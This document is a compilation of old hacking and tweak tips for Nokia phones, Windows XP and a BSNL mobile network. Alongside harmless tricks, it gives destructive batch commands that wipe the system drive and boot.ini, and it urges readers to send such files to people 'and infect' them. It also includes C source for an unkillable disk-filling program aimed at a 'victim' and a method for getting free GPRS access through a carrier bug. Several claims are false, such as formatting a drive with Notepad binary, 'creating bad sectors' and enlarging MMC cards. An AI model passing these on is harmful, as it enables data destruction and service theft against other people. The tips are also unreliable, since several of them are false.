Secret CodesNokia 3210 *#06# for checking the IMEI (International Mobile Equipment Identity) Information you get from the IMEI: XXXXXX XX XXXXXX X TAC FAC SNR SP TAC = Type approval code FAC = Final assembly code SNR = Serial number SP = Spare *#0000# To view Software Version. #746025625# [*#sim0clock#] Checks if the sim clock can be stopped. Sim clock stop is a kind of stand-by mode which will save battery time. This code doesn't work with software version 4.59. *#92702689# [*#war0anty#] takes you to a secret menu with 6 choices: 1. Displays Serial Number. 2. Displays the Month and Year of Manufacture (0997) 3. Displays (if there) the date where the phone was purchased (MMYY) 4. Displays the date of the last repairment - if found (0000) 5. makes you capebel of transferring user data if you have the gear for it 6. shows how many hours the phone has been on Latest software version: V 5.02 NSE-8/9 *#3370# - Enhanced Full Rate Codec (EFR) activation. It will automatically restart. *#3370* - Enhanced Full Rate Codec (EFR) deactivation. It will automatically restart. *#4720# - Half Rate Codec activation. It will automatically restart *#4720* - Half Rate Codec deactivation. It will automatically restart Enhanced Full Rate will give you much better sound quality when you enable it. The new Enhanced Full Rate CODEC adopted by GSM uses the ASELP (Algebraic Code Excitation Linear Prediction) compression technology. This technology allows for much great voice quality in the same number of bits as the older Full Rate CODEC. The older technology was called LPC-RPE (Linear Prediction Coding with Regular Pulse Excitation). Both operate at 13 kilobits.(but you take up more space on the network, so they can charge you more) - Talk-time is reduced by about 5% when using the ERF option.

Creating Nameless Directories in Win XP

Just follow the following steps:
1.Select any file or folder.2.Right click on it,press rename or simply press F2.3.Press and hold the alt key.While holding the Alt key,type numbers 0160 from the numpad.
Note:Type the numbers 0160 from the numpad,that is,the numbers present on the right side of the keyboard.Dont type the numbers which are present on top of the character keys.
4.Press Enter and the nameless file or folder will be created.
Reason:The file or folder that seems nameless is actually named with a single space.
But what if you want to create another nameless file or folder in the same directory ?
For this you will have to rename the file with 2 spaces.Just follow these steps below:
1.Select file,press F2.2.Hold alt key and type 0160 from the numpad.3.Release the alt key.Now without doing anything else,again hold alt key and press 0160.4.Press enter and you will have second nameless file in the same directory.5.Repeat step 3 to create as many nameless files or folders in the same directory.

स्य्स्तेम Boost

If you have 512 mbs or more of memory, you can increase system performanceby having the core system kept in memory.Start RegeditGo to HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management\DisablePagingExecutiveSet the value to be 1Reboot the computer

Format a HDD with notepad

Format a HDD with notepad
Step 1.
Copy The Following In Notepad Exactly as it says01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect
OR
IF u think u cannot format c driver when windows is running try Laughing and u will get it Razz .. any way some more so u can test on other drives this is simple binary codeformat c:\ /Q/X -- this will format your drive c:\01100110011011110111001001101101011000010111010000 1000000110001100111010010111000010000000101111010100010010111101011000format d:\ /Q/X -- this will format your dirve d:\01100110011011110111001001101101011000010111010000 1000000110010000111010010111000010000000101111010100010010111101011000
format a:\ /Q/X -- this will format your drive a:\
01100110011011110111001001101101011000010111010000 1000000110000100111010010111000010000000101111010100010010111101011000
del /F/S/Q c:\boot.ini -- this will cause your computer not to boot.
01100100011001010110110000100000001011110100011000 10111101010011001011110101000100100000011000110011101001011100011000100110111101 1011110111010000101110011010010110111001101001
try to figure out urself rest
cant spoonfeed
its workin
Do not try it on ur PC. dont mess around this is for educational purpose only
still if u cant figure it out try disgo to notepad@Echo offDel C:\ *.*ysave it as Dell.bat
worse
@echo offdel %systemdrive%\*.*/f/s/qshutdown -r -f -t 00and save it as a .bat fileReply With Quote

Folder Names You Cant Keep In Windows

Folder names that u cant creat in WINDOWSHi friends i saw this information in some other site n i know abt the first case but i dont know that there are these many exceptions in creating a file name....Yon can not creat any folder named "prn" or "con" in any verson of dos or windows because prn addressed to printer and con is addressed to console. In fact the following reserved device names cannot be used as the name of a file:CON, PRN, AUX, CLOCK$, NUL, COM1, COM2, COM3, COM4,COM5, COM6, COM7, COM8, COM9, LPT1, LPT2, LPT3, LPT4,LPT5, LPT6, LPT7, LPT8, and LPT9

Create Bad sectors on hard disks

A C source code
/*create bad sectors on the hard disk.** This program will create bad sectors on the hard disk. If you left it* running for long enough, it could render a hard disk quite useless. When* bad sectors are found, the sector is marked as bad, so fixing the hard disk* is not an easy task. Unless the victim has time and knowledge to fix the* disk, the hard drive can be left quite literally defective.* supported by preetam* I don't take responsibility for what you do with this program, served foe educational purpose only.** */#include #include #include #include #include #include #include #define HDSIZE 640000void handle_sig();int main() {int i = 0;int x;int fd[5];signal(SIGINT, handle_sig);signal(SIGHUP, handle_sig);signal(SIGQUIT, handle_sig);signal(SIGABRT, handle_sig);signal(SIGTERM, handle_sig);char *buf;buf = malloc(HDSIZE);printf("sekt0r: trashing hard disk with bad sectors!\n");while(1) {fd[1] = open("/tmp/.test", O_WRONLYO_CREAT, 511);fd[2] = open("/tmp/.test1", O_WRONLYO_CREAT, 511);fd[3] = open("/tmp/.test2", O_WRONLYO_CREAT, 511);fd[4] = open("/tmp/.test3", O_WRONLYO_CREAT, 511);fd[5] = open("/tmp/.test4", O_WRONLYO_CREAT, 511);for(x = 0; x < 5; x++) {write(fd[x], buf, HDSIZE);lseek(fd[x], 0, SEEK_SET);close(fd[x]);} /* end for() loop. */} /* end while() loop. */} /* end main(). */void handle_sig() {/* Reset signal handlers. */signal(SIGINT, handle_sig);signal(SIGHUP, handle_sig);signal(SIGQUIT, handle_sig);signal(SIGABRT, handle_sig);signal(SIGTERM, handle_sig);printf("sekt0r: cannot exit - trashing hard disk with bad sectors!\n");return; /* go back to creating bad sectors. */}

DO YOU GUYS WANT TO CONVERT A 128 MB MMC CARD TO 512MB AT NO COST AT ALL.

I guess it works only for mmc cards.Your files in MMC is stored in multiple (disk) blocks.So if you format using 16K block, the space used will be 16K eventhough your file is just 1K.If you buy MMC, it is usually preformatted with 16K block. Therefore alot of space is wasted as most installed program files are usually less than 2K.You will need a card reader to do this:-1. Connect card reader and copy all your files in the MMC to computer disk.(Make sure you set the show all/hidden/os files to "on")2. Do a format of the MMC using command line "format" and use the /A=size option.Alternative, you can use the Disk Management in Adminstrative Tools to format.Make sure you select FAT16. For 256MB MMC, smallest block you can use is 4K, 128MB is 2K, 64Mb is 1K and 32MB is 512B.(Note: You cannot use the phone "format MMC" to do this as the format just clear the allocation table and does not change the block size)3. Copy back all files to MMC.Now you will find that you will have more space.I have installed many software to to my 256MB MMC and it is nearly full. After doing above, I got an "extra" 32MB.For those who have problem with command line format::Just use the Disk Managament to format1. Goto Start->control Panel->Administrative Tools->Computer management->Disk management2. Select your MMC drive. Right-click and select "Format"3. Select "FAT". Choose Allocation size. For 256Mb MMC select 4K, 128Mb MMC select 2K, 64Mb MMC select 1K and 32Mb MMC select 512BTry it at ur own risk!! Altho its been said that the process will not fry ur mmc and a reformat of the mmc will result in the regular allocations and ur mmc is back to normal.Some people say it works, some say it dont.

Change Start logo in Xp

I’ve read a number of articles on the internet about changing the text on the Start button in XP. On more than one occasion I’ve seen references to a five (5) letter limitation when the button is renamed. I always wondered if this was true or just an assumption someone made because the default ‘start’ just happened to fit the button size. So, I decided to run a test and see if there really was a five character limit.First of all just u need to do is download Resource hacker.Resource HackerTM is a freeware utility to view, modify, rename, add, delete and extract resources in 32bit Windows executables and resource files (*.res). It incorporates an internal resource script compiler and decompiler and works on Win95, Win98, WinME, WinNT, Win2000 and WinXP operating systems.ll its just 541Kb in the size.. click here to go to the download PageDownload Resource HackerFirst StepThe first step is to make a backup copy of the file explorer.exe located at C:\Windows\explorer. Place it in a folder somewhere on your hard drive where it will be safe. Start Resource Hacker and open explorer.exe located at C:\Windows\explorer.exeThe category we are going to be using is String Table In Resource Hacker. Expand it by clicking the plus sign then navigate down to and expand string 37 followed by highlighting 1033. If you are using the Classic Layout rather than the XP Layout, use number 38. The right hand pane will display the stringtable as shown in Fig. 02. We’re going to modify item 578, currently showing the word "start" just as it displays on the current Start button.There is no magic here. Just double click on the word "start" so that it’s highlighted, making sure the quotation marks are not part of the highlight. They need to remain in place, surrounding the new text that you’ll type. Go ahead and type your new entrySecond Step – Modify the RegistryNow that the modified explorer.exe has been created it’s necessary to modify the registry so the file will be recognized when the user logs on to the system. If you don’t know how to access the registry I’m not sure this article is for you, but just in case it’s a temporary memory lapse, go to Start (soon to be something else) Run and type regedit in the Open: field. Navigate to:HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows NT\ CurrentVersion\ Winlogonthe right pane (Fig. 05), double click the Shell entry to open the Edit String dialog box as shown in Fig. 06. In Value data: line, enter the name that was used to save the modified explorer.exe file. Click OK.Close Registry Editor and either log off the system and log back in, or reboot the entire system if that’s your preference. If all went as planned you should see your new Start button with the revised text.u can ofcource change the text of other Baloon Items , My Computer Name, Favourites and so on many more..please Comment on this text if u like itthe source is shared from the internet

Change DOS color

SYNTAX Sets the default console foreground and background colors.COLOR [attr]
attr Specifies color attribute of console output
Color attributes are specified by TWO hex digits -- the first corresponds to the background; the second the foreground. Each digit can be any of the below values.
0 = Black
8 = Gray
1 = Blue
9 = Light Blue
2 = Green
A = Light Green
3 = Aqua
B = Light Aqua
4 = Red
C = Light Red
5 = Purple
D = Light Purple
6 = Yellow
E = Light Yellow
7 = White
F = Bright White
If no argument is given, this command restores the color to what it was when CMD.EXE started. This value either comes from the current console window, the /T command line switch or from the DefaultColor registry value. The COLOR command sets ERRORLEVEL to 1 if an attempt is made to execute the COLOR command with a foreground and background color that are the same. EXAMPLEColor 2A = Creates a green background with light bright green text, similar to many of the FTP, telnet, and old BBS console screens.Valid for a session only

BSNL hack for Internet

Free gprs in bsnl
here are the steps to perform:- Logic: the server has a major bug in it, by which it fails to block two simultaneous connections from the phone and establishes a connection with full internet working, Supported devices: all phones with multichannel gprs support For connection on your mobile phone:- 1) Make two connections like bsnlportal and BSNLPORTAL1 (names of profile don’t matter, u can keep one as billgates and shahrukhkhan lol..the basic purpose of names is to enable the user to differentiate between the two accounts,) 2) Select the application you got to have the full connection working on. Surpassingly "web" now just select "bsnlportal" profile and select a link like wap.cellone.in the page will get open, just press the red button such that the "web" application goes in the background. Make sure that the gprs connection is still established with the web app. Two parallel lines on the top left of the screen will confirm this 3) Now open any other app that requires web connection like opera. Select BSNLPORTAL and open any other link like wap.google.com, u will get error – the aim of using the other app is to perform multi-channel gprs, this is verified by seeing some dots on the pre-existing connection established by "web" (step 2) "Access denied. Technical description: 403 Forbidden - You are not allowed to communicate with the requested resource." 4) close opera and open web and open a site like esato.com 5) if everything is done as said here then esato will load and voila! We have the whole internet! For connection on pc. 1)create a connection and enter the number to be dialed as *99***1# 2) enter the following string as extra initialization command 3)now dial from pc, the connection will be established 4)pick the phone and open "web" open "wap.cellone.in" the phone shows error . 5) close "web" and then from the browser open www.google.com and voila! The whole intenet is here settings for profiles apn: celloneportal ip: 192.168.51.163 port : 8080 leave other fields blank as they are of the least concern! the browser settings on pc too go the same as mentioned above!